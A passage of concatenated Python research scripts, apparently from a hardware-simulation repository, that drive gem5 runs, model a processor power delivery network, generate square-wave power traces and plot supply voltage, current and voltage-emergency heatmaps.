files = get_files(args.input)
names = get_names(files)
print(files)
print(names)
apps = []
times = []
stat_to_plt = "iout"
for file in files[0:2]:
c_title="time,vin,va,vb,vout,_vout_mean,vout_mean,iin,iout,proc_load,enable,prediction,ttn,rt"
df= pd.read_csv(file, header=None, names=c_title.split(","))
apps.append([i for i in np.array(df[stat_to_plt][args.warmup:])])
times.append([i/1000 for i in np.array(df["time"][args.warmup:])])
print(len(times[-1]), len(apps[-1]))
print(len(apps),len(times))
fig, axs = plt.subplots(1, 1, tight_layout=True)
fig.set_size_inches(8,4)
for i, t, n in zip(apps, times, names):
axs.plot(t, i, linewidth=1, label=n)
axs.legend()
#axs.set_yticks(np.arange(0.70,1.10,0.05))
axs.set_xlabel("Time (ns)")
#axs.set_ylabel("Vout (V)")
axs.set_ylabel("Idevice (A)")
fig.suptitle("Device Current Swaptions 8c/8t Harvard PDN")
plt.show()
```
#### File: deprecated/avp_ideal_model/supply.py
```python
class Supply:
vid = 0
v_bulk = 0
v_proc = 0
i_inst = 0
proc_max_i = 0
proc_min_i = 0
proc_max_v = 0
proc_min_v = 0
rpdn = 0
rll = 0
def __init__(self, rpdn, rll, vcc_max, vcc_min, imax, imin):
self.rpdn = rpdn
self.rll = rll
self.proc_max_i = imax
self.proc_min_i = imin
self.proc_max_v = vcc_max
self.proc_min_v = vcc_min
self.vid = vcc_min + rll*imax
def get_i(self):
return self.i_inst
def get_v(self):
return self.v_bulk
def get_v_proc(self):
return self.v_proc
def get_p(self):
return self.i_inst*self.v_bulk
def tick(self, i_proc):
self.i_inst = i_proc
self.v_proc = self.vid - self.rll*self.i_inst
self.v_bulk = self.v_proc + self.rpdn*self.i_inst
```
#### File: python/deprecated/gem5.py
```python
import os
import sys
import re
import subprocess
import tempfile
from contextlib import contextmanager
# Gem5 Global Paths:
gem5_path = "../gem5"
gem5_exe_arm = os.path.join(gem5_path, "build/ARM/gem5.opt")
gem5_exe_x86 = os.path.join(gem5_path, "build/X86/gem5.opt")
gem5_cfg = os.path.join(gem5_path, "configs/example/se.py")
test_path = "testbin"
def get_stats_file(gem5_out):
return os.path.join(gem5_out, "stats.txt")
def get_config_file(gem5_out):
return os.path.join(gem5_out, "config.ini")
def run_gem5(cmd, opts, outname, outdir, cpu_type, mcpat_template, mcpat_path, mcpat_out, mcpat_testname, ps):
global gem5_path
global gem5_exe
global gem5_cfg
global gem5_out
if cpu_type == "ARM":
gem5 = [gem5_exe_arm,
"--outdir="+os.path.join(".", outdir),
"--mcpat_template="+mcpat_template,
"--mcpat_path="+mcpat_path,
"--mcpat_out="+mcpat_out,
"--mcpat_testname="+mcpat_testname,
"--power_profile_start=400000000",
"--power_profile_duration=2000",
"--power_profile_interval=1000",
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--power_profile_interval=1000",
"--num-cpus=1",
"--cpu-type=DerivO3CPU",
"--l1i_size=16kB",
"--l1d_size=64kB",
"--l2cache",
"--l2_size=256kB",
"--caches",
"--mem-size=8GB"]
if cpu_type == "XeonE7-8893":
gem5 = [gem5_exe_x86,
"--outdir="+os.path.join(".", outdir),
"--mcpat_template="+mcpat_template,
"--mcpat_path="+mcpat_path,
"--mcpat_out="+mcpat_out,
"--mcpat_testname="+mcpat_testname,
"--power_profile_start=4000000",
"--power_profile_duration=1000",
"--power_profile_interval=500",
"--ncverilog_path="+ps,
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--power_profile_interval=500",
"--num-cpus=1",
"--cpu-type=DerivO3CPU",
"--l1i_size=16kB",
"--l1i-hwp-type=TaggedPrefetcher",
"--l1d_size=64kB",
"--l1d-hwp-type=TaggedPrefetcher",
"--l2cache",
"--num-l2caches=1",
"--l2_size=256kB",
"--l2-hwp-type=TaggedPrefetcher",
"--l3cache",
"--l3_size=32MB",
"--l3-hwp-type=TaggedPrefetcher",
"--caches",
"--sys-clock=2GHz",
"--mem-size=8GB"]
if cpu_type == "Simple":
gem5 = [gem5_exe_x86,
"--outdir="+os.path.join(".", outdir),
"--mcpat_disable",
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--num-cpus=1",
"--cpu-type=AtomicSimpleCPU",
"--l1i_size=16kB",
"--l1d_size=64kB",
"--l2cache",
"--l2_size=256kB",
"--caches",
"--mem-size=8GB"]
print(" ".join(gem5))
with open(os.path.join(".", outname+".out"), "w") as ostd, \
open(os.path.join(".", outname+".err"), "w") as oerr:
p = subprocess.Popen(gem5, stdout=ostd, stderr=oerr)
p.wait()
#out, err = p.communicate()
#print(out)
# --list-hwp-types: TaggedPrefetcher, BOPPrefetcher, StridePrefetcher ...
# --list-bp-types: localbp, BiModeBP, TAGE, LTAGE, MultiperspectivePerceptron....
#"--power_profile_start=400000000",
#Test Code:
#print(get_stats_file("fft_small"))
#print(get_config_file("fft_small"))
#run_gem5("fft", "4 4096", "fft_small", "1", "DerivO3CPU", "16kB", "64kB", "256kB")
#../gem5/build/ARM/gem5.opt --outdir=./output/fft_small ../gem5/configs/example/se.py --cmd=tests/testbin/fft --options='4 4096' --num-cpus=1 --cpu-type=DerivO3CPU --l1i_size=16kB --l1d_size=64kB --l2cache --l2_size=256kB --cach
```
#### File: deprecated/square_wave/square_wave.py
```python
import os
import sys
import re
import subprocess
import tempfile
import math
import argparse
import numpy as np
from progressbar import AnimatedMarker, Bar, BouncingBar, Counter, ETA, \
FileTransferSpeed, FormatLabel, Percentage, \
ProgressBar, ReverseBar, RotatingMarker, \
SimpleProgress, Timer
parser = argparse.ArgumentParser()
parser.add_argument('--outpath', type=str, default="", help="output path")
parser.add_argument('--duty', type=str, default="0.5", help="duty cycle")
parser.add_argument('--device', type=str, default="server", help="")
args = parser.parse_args()
if(args.device == "server"):
period = [20e-9, 100e-9, 200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05))
amplitude = [25,50,95]
duration=500e-6
timestep=1e-9
min_power = 5
if(args.device == "laptop"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05))
amplitude = [10,25,50]
duration=500e-6
timestep=1e-9
min_power = 1
if(args.device == "mobile"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(2000/3000))
amplitude = [1,3,5]
duration=500e-6
timestep=1e-9
min_power = 0.1
if(args.device == "embedded"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(1500/3000))
amplitude = [0.5,1,2]
duration=500e-6
timestep=1e-9
min_power = 0.1
if(args.device == "perf_uc"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(120/3000))
amplitude = [0.05,0.1,0.15]
duration=500e-6
timestep=1e-9
min_power = 0.01
if(args.device == "lp_uc"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(10/3000))
amplitude = [0.003,0.005,0.010]
duration=500e-6
timestep=1e-9
min_power = 0.001
outpath = args.outpath
duty = float(args.duty)
def increase_power(power, max_power, slew_rate):
return min(max_power, power+slew_rate)
def decrease_power(power, min_power, slew_rate):
return max(min_power, power-slew_rate)
def calc_req(power, voltage):
return voltage*voltage/power
def arg_check(period, slew_rate, min_power, peak_power, timestep, duration, outpath, per_idx, sl_idx, amp_idx):
time = 0
half_p = period/2;
power = min_power
min_rr = 2e-5
max_rr = 5e-6
if (((peak_power - min_power)/slew_rate)/1e9 > min(duty*period, (1-duty)*period)):
return False
if(period < max_rr and (peak_power - min_power) > 25):
return False
if(period < min_rr and (peak_power - min_power) > (2e-5/period)*100):
return False
return True
def trace(period, slew_rate, min_power, peak_power, timestep, duration, outpath, per_idx, sl_idx, amp_idx):
time = 0
half_p = period/2;
power = min_power
min_rr = 2e-5
max_rr = 5e-6
if (((peak_power - min_power)/slew_rate)/1e9 > min(duty*period, (1-duty)*period)):
return False
if(period < max_rr and (peak_power - min_power) > 25):
return False
if(period < min_rr and (peak_power - min_power) > (2e-5/period)*100):
return False
outname = "trace_"+str(per_idx)+"_"+str(sl_idx)+"_"+str(amp_idx)+".csv"
outfile = os.path.join(outpath,outname)
with open(outfile, "w") as of:
time = 0
power = min_power
while(time < duration):
# Start with off:
t1 = time
while(time < t1 + (1-duty)*period):
power = decrease_power(power, min_power, slew_rate)
res = calc_req(power, 1.0)
of.write(",".join([str(time),str(res),str(power)])+"\n")
time += timestep
t1 = time
while(time < t1 + duty*period):
power = increase_power(power, peak_power, slew_rate)
res = calc_req(power, 1.0)
of.write(",".join([str(time),str(res),str(power)])+"\n")
time += timestep
return True
total = len(period)*len(slew_rate)*len(amplitude)
total = 0
for i in range(len(period)):
for j in range(len(slew_rate)):
for k in range(len(amplitude)):
if(arg_check(period[i], slew_rate[j], min_power, min_power+amplitude[k], timestep, duration, outpath, i, j, k)):
total += 1
pbar = ProgressBar(widgets=[Percentage(), Bar(), ETA()], maxval=total).start()
total = 0
for i in range(len(period)):
for j in range(len(slew_rate)):
for k in range(len(amplitude)):
if(trace(period[i], slew_rate[j], min_power, min_power+amplitude[k], timestep, duration, outpath, i, j, k)):
total += 1
pbar.update(total)
pbar.finish()
```
#### File: deprecated/front_end_preds/supply_voltage_over_cycles_backend.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
class Cycle_Dump:
def __init__(self):
self.ve_count = 0
self.action_count = 0
return
def reset(self):
self.ve_flag = False
self.ve_flag_prev = []
self.action_flag = False
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.pred_state = None
self.numCycles_var = None
return
def num_voltage_emergency(self, line):
linespl = line.split()
ve_read = int(linespl[1])
if ve_read > self.ve_count:
self.ve_count = ve_read
self.ve_flag = True
return
def total_action(self, line):
linespl = line.split()
action_read = int(linespl[1])
if action_read > self.action_count:
self.action_count = action_read
self.action_flag = True
return
def counter(self, line):
linespl = line.split()
self.cycle = int(linespl[1])
return
def state(self, line):
linespl = line.split()
self.pred_state = int(linespl[1])
return
def supply_current(self, line):
linespl = line.split()
self.supply_curr = float(linespl[1])
return
def supply_voltage(self, line):
linespl = line.split()
self.supply_volt = float(linespl[1])
return
def numCycles(self,line):
linespl = line.split()
self.numCycles_var = int(linespl[1])
return
#PARAMETERS
HOME = os.environ['HOME']
PREDICTOR = 'HarvardPowerPredictor_1'
CLASS = 'DESKTOP'
TEST = 'crc'
path = HOME + '/output_11_6/gem5_out/' + CLASS + '_' + PREDICTOR + '/' + TEST + '.txt'
print(path)
#PARAMETERS
stats = open(path, 'r')
fig = plt.figure(figsize=(50,5))
ax = plt.axes()
fig.suptitle('Supply Voltage Over Time' + '(' + PREDICTOR + ', ' + CLASS + ', ' + TEST + ' )', fontsize=14)
ax.set_xlabel('Cycle', fontsize=14)
ax.set_ylabel('Supply Voltage', fontsize=14)
ax2 = ax.twinx()
ax2.set_ylabel('Current', color='tab:blue') # we already handled the x-label with ax1
voltage = [0]
current =[0]
#read line by lin
line = stats.readline()
line = stats.readline()
cycle_dump = Cycle_Dump()
while line:
cycle_dump.reset()
while(True):
#one cycle worth of stat dumps
if 'Begin Simulation Statistics' in line or not line:
break
stat_name = line.split()[0].split('.')[-1].split(':')[0]
func = getattr(cycle_dump, stat_name, False)
if func:
func(line)
line = stats.readline()
for _ in range(cycle_dump.numCycles_var):
voltage.append(None)
current.append(None)
#implicit assumption stat dumps are every 2 cycles
voltage[-1] = cycle_dump.supply_volt
current[-1] = cycle_dump.supply_curr
voltage[-2] = (voltage[-1]+voltage[-3])/2
current[-2] = (current[-1]+current[-3])/2
if cycle_dump.ve_flag:
ax.axvspan(len(voltage), len(voltage)+1, color='blue', alpha=0.15)
#if cycle_dump.action_flag:
# ax.axvspan(len(voltage), len(voltage)+1, color='red', alpha=0.3)
line = stats.readline()
xvar = np.linspace(0,len(voltage),len(voltage))
start_cycle = 8000
end_cycle = 17000
ax.plot(xvar, voltage,color='black', linewidth=1.0)
ax.set_ylim(bottom = min(i for i in voltage if i > 0.8), top = max(voltage))
ax2.plot(xvar, current, color='tab:blue')
ax2.tick_params(axis='y', labelcolor='tab:blue')
ax2.set_ylim([min(i for i in current if i > 0.8), max(current)])
plt.xlim(left = start_cycle, right = end_cycle)
plt.savefig(HOME +'/plot/11-3_Supply_Volt+Curr_Over_Time' + '_' + PREDICTOR + '_' + CLASS + '_' + TEST +'_0.5.png', dpi=300)
```
#### File: deprecated/front_end_preds/util.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from enum import Enum
from collections import deque, defaultdict
class PDN:
def __init__(self, L, C, R, VDC, CLK):
self.L = L
self.C = C
self.R = R
self.VDC = VDC
self.CLK = CLK
self.vout_2_cycle_ago = VDC
self.vout_1_cycle_ago = VDC
self.iout_1_cycle_ago = 0
def get_curr(self, current):
ts = 1/self.CLK
LmulC = self.L*self.C
LdivR = self.L/self.R
vout = self.VDC*ts**2/(LmulC) \
+ self.vout_1_cycle_ago*(2 - ts/(LdivR)) \
+ self.vout_2_cycle_ago*(ts/(LdivR) \
- 1 - ts**2/(LmulC)) \
- current*self.R*ts**2/(LmulC) \
- (1/self.C)*ts*(current - self.iout_1_cycle_ago)
self.vout_2_cycle_ago = self.vout_1_cycle_ago
self.vout_1_cycle_ago = vout
self.iout_1_cycle_ago = current
return vout
class Events(Enum):
NO_EVENT = 1
BRANCH_T = 2
BRANCH_NT = 3
BRANCH_MP = 4
FETCH = 5
TLB_STALL = 6
ICACHE_STALL = 7
COMMIT_BLOCK = 8
IQ_FULL = 9
LSQ_FULL = 10
LOAD_EX = 11
LOAD_WB = 12
LOAD_CFETCH = 13
STORE_EXECUTE = 14
STORE_WB = 15
INSTR_DISPATCH = 16
INSTR_ISSUE = 17
INSTR_EXECUTE = 18
INSTR_COMMIT = 19
MEM_MP = 20
EMPTY_EVENT = 21
DUMMY_EVENT2 = 22
#from other stats
DCACHE_MISS = 23
ICACHE_MISS = 24
L2_MISS = 25
TLB_MISS = 16
class Cycle_Dump:
event_map = {
#from new_events_stats
0:'NO_EVENT',
1:'BRANCH_T',
2:'BRANCH_NT',
3:'BRANCH_MP',
4:'FETCH',
5:'TLB_STALL',
6:'ICACHE_STALL',
7:'COMMIT_BLOCK',
8:'IQ_FULL',
9:'LSQ_FULL',
10:'LOAD_EX',
11:'LOAD_WB',
12:'LOAD_CFETCH',
13:'STORE_EXECUTE',
14:'STORE_WB',
15:'INSTR_DISPATCH',
16:'INSTR_ISSUE',
17:'INSTR_EXECUTE',
18:'INSTR_COMMIT',
19:'MEM_MP',
20:'EMPTY_EVENT',
21:'DUMMY_EVENT2',
#from other stats
22:'DCACHE_MISS',
23:'ICACHE_MISS',
24:'L2_MISS',
25:'TLB_MISS',
}
new_events_blacklist = {
0:'NO_EVENT',
20:'EMPTY_EVENT',
21:'DUMMY_EVENT2',
}
def __init__(self, stats):
self.ve_count = 0
self.action_count = 0
self.stats = stats
self.stats.readline()
self.stats.readline()
self.new_events_var = [] #list of new events the current cycle
self.new_events_prev_var = [] #list of new events the previous cycle of the cycle dump
self.table_index_count = 0
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.supply_volt_prev = None
self.anchorPC_var = None
self.numCycles_var = None
self.branchMispredicts_count = 0
self.memOrderViolationEvents_count = 0
self.DcacheMisses_count = 0
self.IcacheMisses_count = 0
self.TLBcacheMisses_count = 0
self.L2cacheMisses_count = 0
keys = self.event_map.keys()
self.event_count = {k: 0 for k in keys}
self.EOF = False
def reset(self):
for e in self.new_events_var:
self.event_count[e] += 1
self.new_events_var = [] #list of new events the current cycle
self.new_events_prev_var = [] #list of new events the previous cycle of the cycle dump
self.table_index_count = 0
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.supply_volt_prev = None
self.anchorPC_var = None
self.numCycles_var = None
return
def new_events(self,line):
linespl = line.split()
event = int(linespl[1])
if (not event in self.new_events_blacklist.keys()) and (event not in self.new_events_var):
self.new_events_var.append(event)
return
# # def new_events_prev(self,line):
# # linespl = line.split()
# # event = int(linespl[1])
# # if event != 20:
# # self.event_count[event] += 1
# # self.new_events_prev_var.append(event)
# return
def counter(self, line):
linespl = line.split()
self.cycle = int(linespl[1])
return
def supply_current(self, line):
linespl = line.split()
self.supply_curr = float(linespl[1])
return
def supply_voltage(self, line):
linespl = line.split()
self.supply_volt = float(linespl[1])
return
def anchorPC(self, line):
linespl = line.split()
self.anchorPC_var = hex(int(linespl[1]))
return
def numCycles(self,line):
linespl = line.split()
self.numCycles_var = int(linespl[1])
return
# def branchMispredicts(self,line):
# linespl = line.split()
# val = int(linespl[1])
# if val > self.branchMispredicts_count:
# self.branchMispredicts_count = val
# self.new_events_var.append(3) #normally enum but its 2am
# def memOrderViolationEvents(self,line):
# linespl = line.split()
# val = int(linespl[1])
# if val > self.memOrderViolationEvents_count:
# self.memOrderViolationEvents_count = val
# self.new_events_var.append(8) #normally enum but its 2am
def overall_misses(self,line):
linespl = line.split()
val = int(linespl[1])
cache = line.split()[0].split('.')[-2]
if (cache == 'l2'):
if val > self.L2cacheMisses_count:
self.L2cacheMisses_count = val
self.new_events_var.append(24) #normally enum but its 2am
if (cache == 'dcache'):
if val > self.DcacheMisses_count:
self.DcacheMisses_count = val
self.new_events_var.append(22) #normally enum but its 2am
if (cache == 'icache'):
if val > self.IcacheMisses_count:
self.IcacheMisses_count = val
self.new_events_var.append(23) #normally enum but its 2am
if (cache == 'itb_walker_cache' or cache == 'dtb_walker_cache'):
if val > self.TLBcacheMisses_count:
self.TLBcacheMisses_count = val
self.new_events_var.append(25) #normally enum but its 2am
def parseCycle(self):
while(True):
line = self.stats.readline()
if not line:
return True
#end of 1 cycle of stat dump
elif (not line.upper().isupper()):
for _ in range(4):
self.stats.readline()
if not line:
return True
return False
else:
#one cycle worth of stat dumps
stat_name = line.split()[0].split('.')[-1].split(':')[0]
func = getattr(self, stat_name, False)
if func:
func(line)
def dump(self):
print('******* CYCLE: ',self.cycle,'*********')
print('SUPPLY CURRENT: ', self.supply_curr)
print('SUPPLY VOLTAGE: ', self.supply_volt)
#print('SUPPLY VOLTAGE_prev: ', self.supply_volt_prev)
print('ANCHOR PC: ', self.anchorPC_var)
#print("EVENTS: ", [event_map[e] for e in self.new_events_var])
# print("New Events : ", " ".join([event_map[i] for i in self.new_events_var]) )
print("***********************************")
def accuracy(action,VE,LEAD_TIME_CAP):
bins = dict()
act_bins = dict()
for i,ve in enumerate(VE):
if ve:
for j in range(0,LEAD_TIME_CAP):
if i-j < 0: break
if action[i-j]:
if j in bins.keys(): bins[j] += 1
else: bins[j] = 1
break
for j in range(0,LEAD_TIME_CAP):
if i-j < 0 or (VE[i-j] and j>0): break
if action[i-j]:
if j in act_bins.keys(): act_bins[j] += 1
else: act_bins[j] = 1
# print(bins)
# print(act_bins)
xvar = [0]
hits = [0]
false_neg = [100]
running_sum = 0
VE_count = sum(VE)
for key in sorted(bins.keys()):
running_sum += bins[key]
false_neg.append(100*(VE_count - running_sum) / VE_count)
xvar.append(key)
hits.append(100 * running_sum / VE_count)
# print(hits)
# print(xvar)
false_pos_x = [0]
false_pos = [100]
action_count = sum(action)
running_sum = 0
for k, v in sorted(act_bins.items()):
running_sum += v
false_pos.append(100*(action_count - running_sum) / action_count)
false_pos_x.append(k)
if (xvar[-1] < false_pos_x[-1]):
xvar.append(false_pos_x[-1])
hits.append(hits[-1])
false_neg.append(false_neg[-1])
if (xvar[-1] > false_pos_x[-1]):
false_pos_x.append(xvar[-1])
false_pos.append(false_pos[-1])
# print(false_neg)
# print(false_pos)
return [xvar,hits,false_neg,false_pos_x,false_pos]
TEST_LIST_spec=[
#"400.perlbench", NO BINARIES
"401.bzip2",
"403.gcc",
"410.bwaves",
#"416.gamess", NO BINARIES
"429.mcf",
"433.milc",
"434.zeusmp",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"447.dealII",
"450.soplex",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
"470.lbm",
"471.omnetpp",
"473.astar",
# "481.wrf", \
# "482.sphinx3", \
# "983.xalancbmk", \
# "998.specrand", \
# "999.specrand" \
]
TEST_LIST_mi = [
"basicmath",
"bitcnts",
"blowfish_decrypt",
"blowfish_encrypt",
"qsort",
"susan_smooth",
# "susan_edge",
# "susan_corner",
"dijkstra",
"rijndael_decrypt",
# "rijndael_encrypt",
"sha",
"crc",
"fft",
"ffti",
"toast",
"untoast"
]
```
#### File: jimmy_plot/deprecated/heatmap.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import decimal
import numpy as np
import os
TEST_LIST_spec=[
# "400.perlbench", NO BINARIES
# "401.bzip2",
# "403.gcc",
# "410.bwaves",
# # "416.gamess", NO BINARIES
"429.mcf",
"433.milc",
# "434.zeusmp",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
# "447.dealII",
# "450.soplex",
"453.povray",
"454.calculix",
"456.hmmer",
# "458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# # "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
# # "983.xalancbmk", \
# # "998.specrand", \
# # "999.specrand" \
]
def plot(x,y,num_ves):
fig, ax = plt.subplots()
im = ax.imshow(num_ves)
# We want to show all ticks...
ax.set_xticks(np.arange(len(x)))
ax.set_yticks(np.arange(len(y)))
# ... and label them with the respective list entries
ax.set_xticklabels(x)
ax.set_yticklabels(y)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(len(y)):
for j in range(len(x)):
val = str(round(num_ves[i, j]*100,1))
text = ax.text(j, i, val,
ha="center", va="center", color="w")
FONTSIZE = 20
ax.set_title("Percent VE not Mitigated - lower is better", fontsize = FONTSIZE)
ax.set_xlabel("Throttle Duration", fontsize = FONTSIZE)
ax.set_ylabel("Lead Time")
fig.set_size_inches(18.5, 18.5)
HOME = os.environ['HOME']
DATE = '4-2-2021_'
NAME = 'HEATMAP qsort'
file_dir = HOME+ '/plot/' + DATE + NAME +'.png'
plt.savefig(file_dir, dpi=300)
print(file_dir)
def run_all(load_paths):
total_ves = 0
raw_data = np.load(load_paths[0])
x = []
y = []
for i in raw_data:
x.append(i[0])
y.append(i[1])
x = list(set(x))
x.sort()
y = list(set(y))
y.sort()
num_ves = np.zeros((len(y), len(x)))
for load_path in load_paths:
raw_data = np.load(load_path)
total_ves += raw_data[0][2]
for i in raw_data:
x_ind = x.index(i[0])
y_ind = y.index(i[1])
num_ves[y_ind][x_ind] += i[2]
np.true_divide(num_ves,total_ves)
plot(x,y,num_ves)
def run(load_path):
raw_data = np.load(load_path)
total_ves = raw_data[0][2]
x = []
y = []
for i in raw_data:
x.append(i[0])
y.append(i[1])
x = list(set(x))
x.sort()
y = list(set(y))
y.sort()
num_ves = np.zeros((len(y), len(x)))
for i in raw_data:
x_ind = x.index(i[0])
y_ind = y.index(i[1])
num_ves[y_ind][x_ind] = i[2]/total_ves
plot(x,y,num_ves)
if __name__ == "__main__":
HOME = os.environ['HOME']
# load_paths = []
# for tn in TEST_LIST_spec:
# test_name = tn + '_35_500000_DESKTOP_IdealSensor'
# load_path = os.path.join(HOME,'plot/data')
# load_path = os.path.join(load_path,test_name+'_lead_time_sweep.npy')
# load_paths.append(load_path)
# run_all(load_paths)
test_name = 'qsort_lead_time_sweep'
load_path = os.path.join(HOME,'plot/data')
load_path = os.path.join(load_path,test_name+'.npy')
# for tn in TEST_LIST_spec:
# run(tn+'_35_500000_DESKTOP_IdealSensor')
run(load_path)
```
#### File: jimmy_plot/deprecated/pc_ve_dist.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
import struct
import os
from functools import reduce
import time
from collections import defaultdict
from cython.sim_pdn import get_volt_wrapper
from cython.ve_dist_sim import ve_dist_wrapper
def get_data(test_name,file_name,_dtype):
output_dir = 'output_4_9_vedist/gem5_out'
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir)
file_path = os.path.join(file_path,test_name)
file_path = os.path.join(file_path,file_name)
print(file_path)
print('loading...')
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
def run():
VDC = 1.4
THRES = 1.3
L = 20e-12
C = 1.32e-06
R = 3.2e-3
CLK = 4E9
tn = '459.GemsFDTD_130_1000000_DESKTOP_HarvardPowerPredictorMitigation'
pc_data = get_data(tn, 'taken_branch.bin',np.uint)
power = get_data(tn, 'power.bin', np.double)
curr = np.true_divide(power, VDC)
print('1. getting voltage...')
[_,ve_cycle] = get_volt_wrapper(curr,THRES,L,C,R,VDC,CLK)
print(' done!')
print('2. calculating stats...')
(avg_ve_dist,perc_pc,pc_stnd_dev,total_pcs,pc_list,ret_data) = ve_dist_wrapper(pc_data,ve_cycle)
perc_pc = [i*1000 for i in perc_pc]
for i in range(30,90):
perc_pc[i] += perc_pc[i+400]/3
perc_pc[i]/=2
print(' done!')
HOME = os.environ['HOME']
DATE = '5-4'
fig, (ax,bx) = plt.subplots(nrows=2, ncols=1)
fig.set_size_inches(8.5, 10.5)
# ax2 = ax.twinx()
# ax.plot(range(len(avg_ve_dist)), avg_ve_dist,linewidth=0.5, color='black', label="cycles to VE")
ax.plot(range(len(perc_pc)), perc_pc,linewidth=0.5, color='blue', alpha=0.5, label="percent of taken branches")
# ax.plot(range(len(pc_stnd_dev)), pc_stnd_dev,linewidth=0.5, color='blue', alpha=0.5, label="percent of taken branches")
ax.set_title('Standard Deviation of Distance from Branchs to VE')
ax.set_xlim([0,500])
ax.set_xlabel('Cycles Before VE')
ax.set_ylabel('Standard Deviation (Cycles)')
# bx.set_xlabel('taken branch')
# bx.set_ylabel('distance to VE')
# ax2.set_ylabel('percent of taken branches', fontsize=18)
# ax.set_xlim([0,1500])
# ax.set_ylim([0,1000])
plot_path = HOME+'/plot/' + DATE + 'gems_long_test_ve_dist' + '.png'
plt.savefig(plot_path, dpi=150)
print(plot_path)
if __name__ == "__main__":
run()
```
#### File: jimmy_plot/deprecated/pdn_test.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
from file_read_backwards import FileReadBackwards
import os, util
from functools import reduce
class PDN:
def __init__(self, L, C, R, VDC, CLK):
self.L = L
self.C = C
self.R = R
self.VDC = VDC
self.CLK = CLK
self.vout_2_cycle_ago = VDC
self.vout_1_cycle_ago = VDC
self.iout_1_cycle_ago = 0
def reset(self):
self.vout_2_cycle_ago = self.VDC
self.vout_1_cycle_ago = self.VDC
self.iout_1_cycle_ago = 0
def get_curr(self, current):
ts = 1/self.CLK
LmulC = self.L*self.C
LdivR = self.L/self.R
vout = self.VDC*ts**2/(LmulC) \
+ self.vout_1_cycle_ago*(2 - ts/(LdivR)) \
+ self.vout_2_cycle_ago*(ts/(LdivR) \
- 1 - ts**2/(LmulC)) \
- current*self.R*ts**2/(LmulC) \
- (1/self.C)*ts*(current - self.iout_1_cycle_ago)
self.vout_2_cycle_ago = self.vout_1_cycle_ago
self.vout_1_cycle_ago = vout
self.iout_1_cycle_ago = current
return vout
VDC = 1.4
pdn = PDN(
# L = 30e-12,
# C = 1.12e-06,
# R = 0.0032,
L = 30e-12,
C = 1e-06,
R = 0.003,
VDC = VDC,
CLK = 4E9,
)
power_stc = 10
power_dyn = 20
voltage = []
power = []
when_load = [0]*320 + [0.3]*270 + [1]*400 #true is load, false is no load
when_load = when_load*3
for load in when_load:
if load:
p = (power_stc+power_dyn*load)
else:
p = (power_stc)
power.append(p)
voltage.append(pdn.get_curr(p/VDC))
voltage_t = []
power_t = []
throttle_start_cycles = [550] #must be always even
while throttle_start_cycles[-1] < len(when_load):
throttle_start_cycles.append(throttle_start_cycles[-1] + 1000)
throttle_end_cycles = [] #must always even
throttle_time = 100
for i in throttle_start_cycles:
throttle_end_cycles.append(i+throttle_time)
is_throttle = False
pdn.CLK = 4E9
pdn.reset()
i=0
while i < len(when_load):
load = when_load[i]
if is_throttle and load:
p = power_dyn*when_load[i]/2 + power_stc
elif not is_throttle and load:
p = power_dyn*when_load[i] + power_stc
elif is_throttle and not load or not is_throttle and not load:
p = power_stc
if throttle_start_cycles[0] == i:
throttle_start_cycles.pop(0)
is_throttle = True
pdn.CLK = 2E9
if throttle_end_cycles[0] == i:
throttle_end_cycles.pop(0)
is_throttle = False
pdn.CLK = 4E9
volt = pdn.get_curr(p/VDC)
power_t.append(p)
voltage_t.append(volt)
if is_throttle:
voltage_t.append(volt)
power_t.append(p)
i+=2
else:
i+=1
fig, (ax1, ax2) = plt.subplots(2, 1)
fig.suptitle(throttle_time, fontsize=16)
fig.set_size_inches(12.5, 7.5)
ax1.plot(range(len(voltage)), voltage, label = 'no throttle')
ax1.plot(range(len(voltage_t)), voltage_t, label = 'throttle')
ax1.legend()
ax1.set_ylim([min(min(voltage)-0.02,min(voltage_t)),VDC+0.03])
# ax1.set_xticks(range(0, len(voltage), 150))
# ax.set_xlim([950,1100])
ax2.plot(range(len(power)), power, label = 'no throttle')
ax2.plot(range(len(power_t)), power_t, label = 'throttle')
ax2.legend()
ax2.set_ylim([0,max(power)*1.1])
HOME = os.environ['HOME']
